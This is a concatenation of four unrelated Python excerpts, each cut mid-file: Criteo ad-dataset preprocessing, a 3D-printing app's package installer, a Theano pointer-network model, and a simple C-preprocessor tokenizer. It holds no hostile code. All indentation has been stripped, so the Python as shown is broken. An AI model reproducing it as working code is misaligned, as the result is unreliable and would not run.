nf.close()
file_id += 1
nf = open(npzfile + "_" + str(file_id), "w")
boundary += total_per_file[file_id]
nf.write(line)
nf.close()
else:
sys.exit("ERROR: Criteo Kaggle Display Ad Challenge Dataset path is invalid; please download from https://labs.criteo.com/2014/02/kaggle-display-advertising-challenge-dataset")
# process a file worth of data and reinitialize data
# note that a file main contain a single or multiple splits
def process_one_file(
datfile,
npzfile,
split,
num_data_in_split,
dataset_multiprocessing,
convertDictsDay=None,
resultDay=None
):
if dataset_multiprocessing:
convertDicts_day = [{} for _ in range(26)]
with open(str(datfile)) as f:
y = np.zeros(num_data_in_split, dtype="i4") # 4 byte int
X_int = np.zeros((num_data_in_split, 13), dtype="i4") # 4 byte int
X_cat = np.zeros((num_data_in_split, 26), dtype="i4") # 4 byte int
if sub_sample_rate == 0.0:
rand_u = 1.0
else:
rand_u = np.random.uniform(low=0.0, high=1.0, size=num_data_in_split)
i = 0
percent = 0
for k, line in enumerate(f):
# process a line (data point)
line = line.split('\t')
# set missing values to zero
for j in range(len(line)):
if (line[j] == '') or (line[j] == '\n'):
line[j] = '0'
# sub-sample data by dropping zero targets, if needed
target = np.int32(line[0])
if target == 0 and \
(rand_u if sub_sample_rate == 0.0 else rand_u[k]) < sub_sample_rate:
continue
y[i] = target
X_int[i] = np.array(line[1:14], dtype=np.int32)
if max_ind_range > 0:
X_cat[i] = np.array(
list(map(lambda x: int(x, 16) % max_ind_range, line[14:])),
dtype=np.int32
)
else:
X_cat[i] = np.array(
list(map(lambda x: int(x, 16), line[14:])),
dtype=np.int32
)
# count uniques
if dataset_multiprocessing:
for j in range(26):
convertDicts_day[j][X_cat[i][j]] = 1
# debug prints
if float(i)/num_data_in_split*100 > percent+1:
percent = int(float(i)/num_data_in_split*100)
print(
"Load %d/%d (%d%%) Split: %d Label True: %d Stored: %d"
% (
i,
num_data_in_split,
percent,
split,
target,
y[i],
),
end="\n",
)
else:
for j in range(26):
convertDicts[j][X_cat[i][j]] = 1
# debug prints
print(
"Load %d/%d Split: %d Label True: %d Stored: %d"
% (
i,
num_data_in_split,
split,
target,
y[i],
),
end="\r",
)
i += 1
# store num_data_in_split samples or extras at the end of file
# count uniques
# X_cat_t = np.transpose(X_cat)
# for j in range(26):
# for x in X_cat_t[j,:]:
# convertDicts[j][x] = 1
# store parsed
filename_s = npzfile + "_{0}.npz".format(split)
if os.path.exists(filename_s):
print("\nSkip existing " + filename_s)
else:
np.savez_compressed(
filename_s,
X_int=X_int[0:i, :],
# X_cat=X_cat[0:i, :],
X_cat_t=np.transpose(X_cat[0:i, :]), # transpose of the data
y=y[0:i],
)
print("\nSaved " + npzfile + "_{0}.npz!".format(split))
if dataset_multiprocessing:
resultDay[split] = i
convertDictsDay[split] = convertDicts_day
return
else:
return i
# create all splits (reuse existing files if possible)
recreate_flag = False
convertDicts = [{} for _ in range(26)]
# WARNING: to get reproducable sub-sampling results you must reset the seed below
# np.random.seed(123)
# in this case there is a single split in each day
for i in range(days):
npzfile_i = npzfile + "_{0}.npz".format(i)
npzfile_p = npzfile + "_{0}_processed.npz".format(i)
if os.path.exists(npzfile_i):
print("Skip existing " + npzfile_i)
elif os.path.exists(npzfile_p):
print("Skip existing " + npzfile_p)
else:
recreate_flag = True
if recreate_flag:
if dataset_multiprocessing:
resultDay = Manager().dict()
convertDictsDay = Manager().dict()
processes = [Process(target=process_one_file,
name="process_one_file:%i" % i,
args=(npzfile + "_{0}".format(i),
npzfile,
i,
total_per_file[i],
dataset_multiprocessing,
convertDictsDay,
resultDay,
)
) for i in range(0, days)]
for process in processes:
process.start()
for process in processes:
process.join()
for day in range(days):
total_per_file[day] = resultDay[day]
print("Constructing convertDicts Split: {}".format(day))
convertDicts_tmp = convertDictsDay[day]
for i in range(26):
for j in convertDicts_tmp[i]:
convertDicts[i][j] = 1
else:
for i in range(days):
total_per_file[i] = process_one_file(
npzfile + "_{0}".format(i),
npzfile,
i,
total_per_file[i],
dataset_multiprocessing,
)
# report and save total into a file
total_count = np.sum(total_per_file)
if not os.path.exists(total_file):
np.savez_compressed(total_file, total_per_file=total_per_file)
print("Total number of samples:", total_count)
print("Divided into days/splits:\n", total_per_file)
# dictionary files
counts = np.zeros(26, dtype=np.int32)
if recreate_flag:
# create dictionaries
for j in range(26):
for i, x in enumerate(convertDicts[j]):
convertDicts[j][x] = i
dict_file_j = d_path + d_file + "_fea_dict_{0}.npz".format(j)
if not os.path.exists(dict_file_j):
np.savez_compressed(
dict_file_j,
| |
be removed, then the package is being updated and it should be listed.
if self._to_install_package_dict.keys():
all_installed_ids = all_installed_ids.union(set(self._to_install_package_dict.keys()))
return all_installed_ids
## Get a list of tuples that contain the package ID and version.
# Used by the Marketplace to check which packages have updates available.
def getAllInstalledPackageIdsAndVersions(self) -> List[Tuple[str, str]]:
package_ids_and_versions = [] # type: List[Tuple[str, str]]
all_installed_ids = self.getAllInstalledPackageIDs()
for package_id in all_installed_ids:
package_info = self.getInstalledPackageInfo(package_id)
if package_info is None:
continue
if "package_version" not in package_info:
continue
package_ids_and_versions.append((package_id, package_info["package_version"]))
return package_ids_and_versions
def getAllInstalledPackagesInfo(self) -> Dict[str, List[Dict[str, Any]]]:
all_installed_ids = self.getAllInstalledPackageIDs()
# map of <package_type> -> <package_id> -> <package_info>
installed_packages_dict = {} # type: Dict[str, List[Dict[str, Any]]]
for package_id in all_installed_ids:
# Skip required plugins as they should not be tampered with
if package_id in self._application.getRequiredPlugins():
continue
package_info = self.getInstalledPackageInfo(package_id)
if package_info is None:
continue
# If there is not a section in the dict for this type, add it
if package_info["package_type"] not in installed_packages_dict:
installed_packages_dict[package_info["package_type"]] = []
# Finally, add the data
installed_packages_dict[package_info["package_type"]].append(package_info)
return installed_packages_dict
def getToRemovePackageIDs(self) -> Set[str]:
return self._to_remove_package_set
# Checks if the given package is installed (at all).
def isPackageInstalled(self, package_id: str) -> bool:
return self.getInstalledPackageInfo(package_id) is not None
# This is called by drag-and-dropping curapackage files.
@pyqtSlot(QUrl)
def installPackageViaDragAndDrop(self, file_url: str) -> None:
filename = QUrl(file_url).toLocalFile()
return self.installPackage(filename)
# Schedules the given package file to be installed upon the next start.
@pyqtSlot(str)
def installPackage(self, filename: str) -> None:
has_changes = False
package_id = ""
try:
# Get package information
package_info = self.getPackageInfo(filename)
if not package_info:
return
package_id = package_info["package_id"]
# If the package is being installed but it is in the list on to remove, then it is deleted from that list.
if package_id in self._to_remove_package_set:
self._to_remove_package_set.remove(package_id)
# We do not check if the same package has been installed already here because, for example, in Cura,
# it may need to install a package with the same package-version but with a higher SDK version. So,
# the package-version is not the only version that can be in play here.
# Need to use the lock file to prevent concurrent I/O issues.
with self._container_registry.lockFile():
Logger.log("i", "Package [%s] version [%s] is scheduled to be installed.",
package_id, package_info["package_version"])
# Copy the file to cache dir so we don't need to rely on the original file to be present
package_cache_dir = os.path.join(os.path.abspath(Resources.getCacheStoragePath()), "cura_packages")
if not os.path.exists(package_cache_dir):
os.makedirs(package_cache_dir, exist_ok=True)
target_file_path = os.path.join(package_cache_dir, package_id + ".curapackage")
shutil.copy2(filename, target_file_path)
self._to_install_package_dict[package_id] = {"package_info": package_info,
"filename": target_file_path}
has_changes = True
except:
Logger.logException("c", "Failed to install package file '%s'", filename)
finally:
self._saveManagementData()
if has_changes:
self.installedPackagesChanged.emit()
if package_id in self._packages_with_update_available:
# After installing the update, the check will return that not other updates are available.
# In that case we remove it from the list. This is actually a safe check (could be removed)
if not self.checkIfPackageCanUpdate(package_id):
# The install ensured that the package no longer has a valid update option.
self._packages_with_update_available.remove(package_id)
self.packagesWithUpdateChanged.emit()
# Schedules the given package to be removed upon the next start.
# \param package_id id of the package
# \param force_add is used when updating. In that case you actually want to uninstall & install
@pyqtSlot(str)
def removePackage(self, package_id: str, force_add: bool = False) -> None:
# Check the delayed installation and removal lists first
if not self.isPackageInstalled(package_id):
Logger.log("i", "Attempt to remove package [%s] that is not installed, do nothing.", package_id)
return
# Extra safety check
if package_id not in self._installed_package_dict and package_id in self._bundled_package_dict:
Logger.log("i", "Not uninstalling [%s] because it is a bundled package.")
return
if package_id not in self._to_install_package_dict or force_add:
# Schedule for a delayed removal:
self._to_remove_package_set.add(package_id)
else:
if package_id in self._to_install_package_dict:
# Remove from the delayed installation list if present
del self._to_install_package_dict[package_id]
self._saveManagementData()
self.installedPackagesChanged.emit()
# It might be that a certain update is suddenly available again!
if self.checkIfPackageCanUpdate(package_id):
self._packages_with_update_available.add(package_id)
self.packagesWithUpdateChanged.emit()
## Is the package an user installed package?
def isUserInstalledPackage(self, package_id: str) -> bool:
return package_id in self._installed_package_dict
# Removes everything associated with the given package ID.
def _purgePackage(self, package_id: str) -> None:
# Iterate through all directories in the data storage directory and look for sub-directories that belong to
# the package we need to remove, that is the sub-dirs with the package_id as names, and remove all those dirs.
data_storage_dir = os.path.abspath(Resources.getDataStoragePath())
for root, dir_names, _ in os.walk(data_storage_dir):
for dir_name in dir_names:
package_dir = os.path.join(root, dir_name, package_id)
if os.path.exists(package_dir):
Logger.log("i", "Removing '%s' for package [%s]", package_dir, package_id)
shutil.rmtree(package_dir)
break
# Installs all files associated with the given package.
def _installPackage(self, installation_package_data: Dict[str, Any]) -> None:
package_info = installation_package_data["package_info"]
filename = installation_package_data["filename"]
package_id = package_info["package_id"]
Logger.log("i", "Installing package [%s] from file [%s]", package_id, filename)
# Load the cached package file and extract all contents to a temporary directory
if not os.path.exists(filename):
Logger.log("w", "Package [%s] file '%s' is missing, cannot install this package", package_id, filename)
return
try:
with zipfile.ZipFile(filename, "r") as archive:
temp_dir = tempfile.TemporaryDirectory()
archive.extractall(temp_dir.name)
except Exception:
Logger.logException("e", "Failed to install package from file [%s]", filename)
return
# Remove it first and then install
try:
self._purgePackage(package_id)
except Exception as e:
message = Message(catalog.i18nc("@error:update",
"There was an error uninstalling the package {package} before installing "
"new version:\n{error}.\nPlease try to upgrade again later.".format(
package = package_id, error = str(e))),
title = catalog.i18nc("@info:title", "Updating error"))
message.show()
return
# Copy the folders there
for sub_dir_name, installation_root_dir in self._installation_dirs_dict.items():
src_dir_path = os.path.join(temp_dir.name, "files", sub_dir_name)
dst_dir_path = os.path.join(installation_root_dir, package_id)
if not os.path.exists(src_dir_path):
Logger.log("w", "The path %s does not exist, so not installing the files", src_dir_path)
continue
self.__installPackageFiles(package_id, src_dir_path, dst_dir_path)
# Remove the file
try:
os.remove(filename)
except Exception:
Logger.log("w", "Tried to delete file [%s], but it failed", filename)
# Move the info to the installed list of packages only when it succeeds
self._installed_package_dict[package_id] = self._to_install_package_dict[package_id]
self._installed_package_dict[package_id]["package_info"]["is_installed"] = True
def __installPackageFiles(self, package_id: str, src_dir: str, dst_dir: str) -> None:
Logger.log("i", "Moving package {package_id} from {src_dir} to {dst_dir}".format(package_id=package_id, src_dir=src_dir, dst_dir=dst_dir))
try:
shutil.move(src_dir, dst_dir)
except FileExistsError:
Logger.log("w", "Not moving %s to %s as the destination already exists", src_dir, dst_dir)
# Gets package information from the given file.
def getPackageInfo(self, filename: str) -> Dict[str, Any]:
package_json = {} # type: Dict[str, Any]
try:
with zipfile.ZipFile(filename) as archive:
# Go through all the files and use the first successful read as the result
for file_info in archive.infolist():
if file_info.filename.endswith("package.json"):
Logger.log("d", "Found potential package.json file '%s'", file_info.filename)
try:
with archive.open(file_info.filename, "r") as f:
package_json = json.loads(f.read().decode("utf-8"))
# Add by default properties
package_json["is_active"] = True
package_json["is_bundled"] = False
package_json["is_installed"] = False
break
except:
Logger.logException("e", "Failed to load potential package.json file '%s' as text file.",
file_info.filename)
except zipfile.BadZipFile:
Logger.logException("e", "Failed to unpack the file %s", filename)
return package_json
# Gets the license file content if present in the given package file.
# Returns None if there is no license file found.
def getPackageLicense(self, filename: str) -> Optional[str]:
license_string = None
def is_license(zipinfo: zipfile.ZipInfo) -> bool:
return os.path.basename(zipinfo.filename).startswith("LICENSE")
with zipfile.ZipFile(filename) as archive:
# Go through all the files and use the first successful read as the result
license_files = sorted(filter(is_license, archive.infolist()), key = lambda x: len(x.filename)) # Find the one with the shortest path.
for file_info in license_files:
Logger.log("d", "Found potential license file '{filename}'".format(filename = file_info.filename))
try:
with archive.open(file_info.filename, "r") as f:
data = f.read()
license_string = data.decode("utf-8")
break
except:
Logger.logException("e", "Failed to load potential license file '%s' as text file.", file_info.filename)
license_string = None
return license_string
## Find the package files by package_id by looking at the installed folder
@staticmethod
def getPackageFiles(package_id) -> List[Tuple[str, List[str]]]:
data_storage_dir = os.path.abspath(Resources.getDataStoragePath())
os_walk = []
dirs_to_check = []
result = [] # 2-tuples of (dir, file_names)
for root_path, dir_names, file_names in os.walk(data_storage_dir):
os_walk.append((root_path, dir_names, file_names))
for dir_name in dir_names:
package_dir = os.path.join(root_path, dir_name, package_id)
if os.path.exists(package_dir):
dirs_to_check.append(package_dir)
for root_path, dir_names, file_names in os_walk:
for dir_to_check in dirs_to_check:
if root_path.startswith(dir_to_check):
result.append((root_path, file_names))
return result
## Return container ids for contents found with package_id
@staticmethod
def getPackageContainerIds(package_id: str) | |
<filename>theano/ptrnets.py
from collections import OrderedDict
import cPickle as pkl
import sys
import time
import argparse
import random
import numpy
import theano
from theano import config
import theano.tensor as tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from shapely.geometry.polygon import Polygon
import data_utils
datasets = {
'tsp': (data_utils.load_data, data_utils.prepare_data), # TSP
'ch': (data_utils.load_data, data_utils.prepare_data) # Convex Hull
}
# Set the random number generators' seeds for consistency
SEED = 123
numpy.random.seed(SEED)
def numpy_floatX(data):
return numpy.asarray(data, dtype=config.floatX)
def get_minibatches_idx(n, minibatch_size, shuffle=False):
"""
Used to shuffle the dataset at each iteration.
"""
idx_list = numpy.arange(n, dtype="int32")
if shuffle:
numpy.random.shuffle(idx_list)
minibatches = []
minibatch_start = 0
for i in range(n // minibatch_size):
minibatches.append(idx_list[minibatch_start:minibatch_start + minibatch_size])
minibatch_start += minibatch_size
if minibatch_start != n:
# Make a minibatch out of what is left
minibatches.append(idx_list[minibatch_start:])
return zip(range(len(minibatches)), minibatches)
def zipp(params, tparams):
"""
When we reload the model. Needed for the GPU stuff.
"""
for kk, vv in params.iteritems():
tparams[kk].set_value(vv)
def unzip(zipped):
"""
When we pickle the model. Needed for the GPU stuff.
"""
new_params = OrderedDict()
for kk, vv in zipped.iteritems():
new_params[kk] = vv.get_value()
return new_params
def dropout_layer(state_before, use_noise, trng):
proj = tensor.switch(use_noise,
(state_before *
trng.binomial(state_before.shape,
p=0.5, n=1,
dtype=state_before.dtype)),
state_before * 0.5)
return proj
def get_dataset(name):
return datasets[name][0], datasets[name][1]
def _p(pp, name):
return '%s_%s' % (pp, name)
def _pd(pp, name, ix):
return '%s_%s_%s' % (pp, name, ix)
def rand_weight(ndim, ddim, lo, hi):
randn = numpy.random.rand(ndim, ddim)
randn = randn * (hi - lo) + lo
return randn.astype(config.floatX)
def ortho_weight(ndim):
W = numpy.random.randn(ndim, ndim)
u, s, v = numpy.linalg.svd(W)
return u.astype(config.floatX)
def init_params(options):
params = OrderedDict()
# lstm gates parameters
W = numpy.concatenate([rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_en_W'] = W
U = numpy.concatenate([rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_en_U'] = U
b = numpy.zeros((4 * options['dim_proj'],))
params['lstm_en_b'] = b.astype(config.floatX)
W = numpy.concatenate([rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['data_dim'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_de_W'] = W
U = numpy.concatenate([rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08),
rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)], axis=1)
params['lstm_de_U'] = U
b = numpy.zeros((4 * options['dim_proj'],))
params['lstm_de_b'] = b.astype(config.floatX)
params['lstm_hterm'] = rand_weight(options['dim_proj'], 1, -0.08, 0.08)[:, 0]
# ptr parameters
params['ptr_W1'] = rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)
params['ptr_W2'] = rand_weight(options['dim_proj'], options['dim_proj'], -0.08, 0.08)
params['ptr_v'] = rand_weight(options['dim_proj'], 1, -0.08, 0.08)[:, 0]
return params
def load_params(path, params):
pp = numpy.load(path)
for kk, vv in params.iteritems():
if kk not in pp:
raise Warning('%s is not in the archive' % kk)
params[kk] = pp[kk]
return params
def init_tparams(params):
tparams = OrderedDict()
for kk, pp in params.iteritems():
tparams[kk] = theano.shared(params[kk], name=kk)
return tparams
def sgd(lr, tparams, grads, p, p_mask, x, x_mask, y, y_mask, cost):
""" Stochastic Gradient Descent
:note: A more complicated version of sgd then needed. This is
done like that for adadelta and rmsprop.
"""
# New set of shared variable that will contain the gradient
# for a mini-batch.
gshared = [theano.shared(v.get_value() * 0., name='%s_grad' % k)
for k, v in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
# Function that computes gradients for a mini-batch, but do not
# updates the weights.
f_grad_shared = theano.function([p, p_mask, x, x_mask, y, y_mask], cost, updates=gsup,
name='sgd_f_grad_shared')
pup = [(v, v - lr * g) for v, g in zip(tparams.values(), gshared)]
# Function that updates the weights from the previously computed
# gradient.
f_update = theano.function([lr], [], updates=pup, name='sgd_f_update')
return f_grad_shared, f_update
def rmsprop(lr, tparams, grads, p, p_mask, x, x_mask, y, y_mask, cost):
zipped_grads = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_grad' % k)
for k, q in tparams.iteritems()]
running_grads = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_rgrad' % k)
for k, q in tparams.iteritems()]
running_grads2 = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_rgrad2' % k)
for k, q in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rgup = [(rg, 0.95 * rg + 0.05 * g) for rg, g in zip(running_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function([p, p_mask, x, x_mask, y, y_mask], cost,
updates=zgup + rgup + rg2up,
name='rmsprop_f_grad_shared')
updir = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_updir' % k)
for k, q in tparams.iteritems()]
updir_new = [(ud, 0.9 * ud - 1e-4 * zg / tensor.sqrt(rg2 - rg ** 2 + 1e-4))
for ud, zg, rg, rg2 in zip(updir, zipped_grads, running_grads,
running_grads2)]
param_up = [(q, q + udn[1])
for q, udn in zip(tparams.values(), updir_new)]
f_update = theano.function([lr], [], updates=updir_new + param_up,
on_unused_input='ignore',
name='rmsprop_f_update')
return f_grad_shared, f_update
def adadelta(lr, tparams, grads, p, p_mask, x, x_mask, y, y_mask, cost):
zipped_grads = [theano.shared(q.get_value() * numpy_floatX(0.), name='%s_grad' % k)
for k, q in tparams.iteritems()]
running_up2 = [theano.shared(q.get_value() * numpy_floatX(0.),name='%s_rup2' % k)
for k, q in tparams.iteritems()]
running_grads2 = [theano.shared(q.get_value() * numpy_floatX(0.),name='%s_rgrad2' % k)
for k, q in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function([p, p_mask, x, x_mask, y, y_mask], cost, updates=zgup + rg2up,
name='adadelta_f_grad_shared')
updir = [-tensor.sqrt(ru2 + 1e-6) / tensor.sqrt(rg2 + 1e-6) * zg
for zg, ru2, rg2 in zip(zipped_grads, running_up2, running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2))
for ru2, ud in zip(running_up2, updir)]
param_up = [(q, q + ud) for q, ud in zip(tparams.values(), updir)]
f_update = theano.function([lr], [], updates=ru2up + param_up,
on_unused_input='ignore',
name='adadelta_f_update')
return f_grad_shared, f_update
def ptr_network(tparams, p, p_mask, x, x_mask, xi, xi_mask, hidi, celi, hids, options):
n_sizes = p.shape[0]
n_samples = p.shape[1] if p.ndim == 3 else 1
n_steps = x.shape[0]
beam_width = xi.shape[0]
assert p_mask is not None
assert x_mask is not None
assert xi_mask is not None
def _slice(_x, n, dim):
if _x.ndim == 3:
return _x[:, :, n * dim:(n + 1) * dim]
if _x.ndim == 2:
return _x[:, n * dim:(n + 1) * dim]
return _x[n * dim:(n + 1) * dim]
def softmax(m_, x_):
maxes = tensor.max(x_, axis=0, keepdims=True)
e = tensor.exp(x_ - maxes)
dist = e / tensor.sum(e * m_, axis=0)
return dist
def _lstm(m_, x_, h_, c_, prefix='lstm_en'):
preact = tensor.dot(x_, tparams[_p(prefix, 'W')]) + tparams[_p(prefix, 'b')]
preact += tensor.dot(h_, tparams[_p(prefix, 'U')])
i = tensor.nnet.sigmoid(_slice(preact, 0, options['dim_proj']))
f = tensor.nnet.sigmoid(_slice(preact, 1, options['dim_proj']))
o = tensor.nnet.sigmoid(_slice(preact, 2, options['dim_proj']))
c = tensor.tanh(_slice(preact, 3, options['dim_proj']))
c = f * c_ + i * c
c = m_[:, None] * c + (1. - m_)[:, None] * c_
h = o * tensor.tanh(c)
h = m_[:, None] * h + (1. - m_)[:, None] * h_
return h, c
def _ptr_probs(xm_, x_, h_, c_, _, hprevs, hprevs_m):
xemb = p[x_, tensor.arange(n_samples), :] # n_samples * dim_proj
h, c = _lstm(xm_, xemb, h_, c_, 'lstm_de')
u = tensor.dot(hprevs, tparams['ptr_W1']) + tensor.dot(h, tparams['ptr_W2']) # n_steps * n_samples * dim
u = tensor.tanh(u) # n_sizes * n_samples * dim_proj
u = tensor.dot(u, tparams['ptr_v']) # n_sizes * n_samples
# prob = tensor.nnet.softmax(u.T).T # n_sizes * n_samples
prob = softmax(hprevs_m, u)
return h, c, prob
# encoding
# we add a blank header to p and p_mask, so pointer to the blank header means pointing to the terminated mark
# see data_utils.prepare_data for more details
ones = tensor.ones((n_samples,), dtype=p.dtype)
h0 = tensor.outer(ones, tparams['lstm_hterm']) # n_samples * dim_proj; T.tile doesn't work on non-constant reps
c0 = tensor.alloc(numpy_floatX(0.), n_samples, options['dim_proj'])
rval, _ = theano.scan(_lstm,
sequences=[p_mask, p],
outputs_info=[h0, c0],
name='encoding',
n_steps=n_sizes)
hiddens, cells = rval # hiddens: n_sizes * n_samples * dim_proj
# hiddens = tensor.concatenate([tensor.shape_padleft(h0), hiddens], axis=0)
f_encode = theano.function([p_mask, p], hiddens)
# decoding
hiddens_mask = tensor.set_subtensor(p_mask[0, :], tensor.constant(1, dtype=config.floatX))
# hiddens_mask = tensor.concatenate([tensor.ones((1, n_samples), dtype=config.floatX), p_mask], axis=0)
rval, _ = theano.scan(_ptr_probs,
sequences=[x_mask, x],
outputs_info=[hiddens[-1], # n_samples * dim_proj
tensor.alloc(numpy_floatX(0.), n_samples, options['dim_proj']), # cells[-1],
tensor.alloc(numpy_floatX(0.), n_sizes, n_samples)],
non_sequences=[hiddens, hiddens_mask],
name='decoding',
n_steps=n_steps)
preds = rval[2]
f_decode = theano.function([p_mask, p, x_mask, x], preds)
# generating
# xi, vector
# xi_mask, vector
# hidi, matrix beam_width * dim_proj
# celi matrix beam_width * dim_proj
# hids, | |
<filename>generate.py
#!/usr/bin/env python
# Contains very primitive and incomplete parser of C preprocessor directives.
# May accidentally read invalid C source without any errors.
import collections
import json
import os.path
import re
import sys
import six
_TOKENS = (
_T_HASH,
_T_IDENTIFIER,
_T_INT,
_T_STRING,
_T_INCLUDE,
_T_OTHER,
) = (
re.compile(r'#'),
re.compile(r'[_a-zA-Z][_0-9a-zA-Z]*'),
re.compile(r'[+-]?[0-9]+'),
re.compile(r'"([^"]*)"'), # TODO: "a\"b".
re.compile(r'<([^>]*)>'),
re.compile(r'\S+'),
)
_QUIRKS = {
'none': {},
'linux': {},
'macos': {
'no_includes': True,
'id_blacklist': {'errno'},
},
'windows': {
'no_includes': True,
'id_blacklist': {'errno'},
},
}
def _read_lines(f_name):
line_n = 0
rel_f_name = os.path.relpath(f_name)
with open(f_name, 'r') as f_obj:
for raw_line in f_obj:
line_n += 1
yield rel_f_name, line_n, raw_line
def _merge_continued_lines(raw_lines):
f_name = '<error>'
line_n = -1
prev = None
for f_name, line_n, raw_line in raw_lines:
rstripped = raw_line.rstrip()
if rstripped[-1:] == '\\':
if prev is None:
prev = rstripped[:-1]
else:
prev += rstripped[:-1]
else:
if prev is not None:
raw_line = prev + raw_line
prev = None
yield f_name, line_n, raw_line
if prev is not None:
raise RuntimeError(
'%s:%d: EOF after backslash-newline' % (
f_name, line_n))
def _replace_comments(raw_lines):
# TODO: Ignore comments within string literals.
f_name = '<error>'
line_n = -1
multiline_block = None
prev = None
for f_name, line_n, raw_line in raw_lines:
ready_comments = []
if multiline_block is not None:
# Multiline block comment was previously started.
block_end = raw_line.find('*/')
if block_end == -1:
# Whole line is in the block comment.
multiline_block += raw_line
raw_line = ''
else:
# End of the block comment.
multiline_block += raw_line[:block_end]
raw_line = prev + ' ' + raw_line[block_end + 2:]
prev = None
ready_comments.append(multiline_block)
multiline_block = None
if multiline_block is None:
# Normal line.
search_pos = 0
while search_pos < len(raw_line):
block_start = raw_line.find('/*', search_pos)
if block_start == -1:
# No block comments in this line.
new_multiline_block = None
block_comment = None
new_raw_line = raw_line
new_search_pos = len(new_raw_line)
else:
block_end = raw_line.find('*/', block_start + 2)
if block_end == -1:
# Start of multiline block comment.
new_multiline_block = raw_line[block_start + 2:]
block_comment = None
new_raw_line = ''
prev = raw_line[:block_start]
new_search_pos = len(new_raw_line)
else:
# Short block comment.
new_multiline_block = None
block_comment = raw_line[block_start + 2:block_end]
new_raw_line = \
raw_line[:block_start] + \
' ' + \
raw_line[block_end + 2:]
new_search_pos = block_start + 1
# Check for line comment.
if block_start == -1:
block_start = len(raw_line)
line_start = raw_line.find('//', search_pos, block_start)
if line_start == -1:
multiline_block = new_multiline_block
if block_comment is not None:
ready_comments.append(block_comment)
raw_line = new_raw_line
search_pos = new_search_pos
else:
prev = None
ready_comments.append(raw_line[line_start + 2:])
raw_line = raw_line[:line_start]
search_pos = len(raw_line)
yield f_name, line_n, raw_line, ready_comments
if multiline_block is not None:
raise RuntimeError(
'%s:%d: EOF without closing multiline block comment' % (
f_name, line_n))
def _skip_empty(raw_lines):
for f_name, line_n, raw_line, comments in raw_lines:
if raw_line.strip():
yield f_name, line_n, raw_line, comments
def _tokenize(raw_lines):
for f_name, line_n, raw_line, comments in raw_lines:
tokens = []
while True:
raw_line = raw_line.lstrip()
if not raw_line:
break
match = None
match_re = None
for token_re in _TOKENS:
match = token_re.match(raw_line)
if match is not None:
match_re = token_re
break
if match is None:
raise RuntimeError(
'%s:%d: Unknown token %r' % (
f_name, line_n, raw_line))
else:
raw_line = raw_line[len(match.group(0)):]
tokens.append((match, match_re))
yield f_name, line_n, tokens, comments
def _match_token(token, reference):
if reference is None:
# Any token.
return True
if hasattr(reference, 'match'):
# Matched with specific regex.
_, match_re = token
return match_re == reference
# Fixed string.
match, _ = token
return match.group(0) == reference
def _match_tokens(tokens, reference, full=True):
if reference:
if tokens:
return _match_token(tokens[0], reference[0]) & \
_match_tokens(tokens[1:], reference[1:], full)
else:
return False
else:
if full:
if tokens:
return False
else:
return True
else:
return True
def _process_ifdefs(token_lines, defined=None):
# TODO: support #if and #elif.
f_name = '<error>'
line_n = -1
if defined is None:
defined = {}
state = []
enabled = []
for f_name, line_n, tokens, comments in token_lines:
if _match_tokens(
tokens,
(
_T_HASH,
'ifdef',
_T_IDENTIFIER,
)):
state.append('ifdef')
enabled.append(tokens[2][0].group(0) in defined)
elif _match_tokens(
tokens,
(
_T_HASH,
'ifndef',
_T_IDENTIFIER,
)):
state.append('ifndef')
enabled.append(tokens[2][0].group(0) not in defined)
elif _match_tokens(
tokens,
(
_T_HASH,
'else',
)):
if not state:
raise RuntimeError(
'%s:%d: Unexpected #else (no #ifdef/#ifndef)' % (
f_name, line_n))
if state.pop() in ('ifdef', 'ifndef'):
state.append('else')
enabled[-1] = not enabled[-1]
else:
raise RuntimeError(
'%s:%d: Unexpected #else (not #ifdef/#ifndef)' % (
f_name, line_n))
elif _match_tokens(
tokens,
(
_T_HASH,
'endif',
)):
if not state:
raise RuntimeError(
'%s:%d: Unexpected #endif (no #ifdef/#ifndef/#else)' % (
f_name, line_n))
state.pop()
enabled.pop()
elif _match_tokens(
tokens,
(
_T_HASH,
'if',
None,
), False):
# Hack to "ignore" #if.
# Breaks #else.
state.append('ifdef')
enabled.append(False)
else:
if all(enabled):
yield f_name, line_n, tokens, comments
if state:
raise RuntimeError(
'%s:%d: #ifdef/#ifndef not closed' % (
f_name, line_n))
def _read_tokens_from_single_file(f_name):
lines = _read_lines(f_name)
lines = _merge_continued_lines(lines)
lines = _replace_comments(lines)
lines = _skip_empty(lines)
token_lines = _tokenize(lines)
token_lines = _process_ifdefs(token_lines)
return token_lines
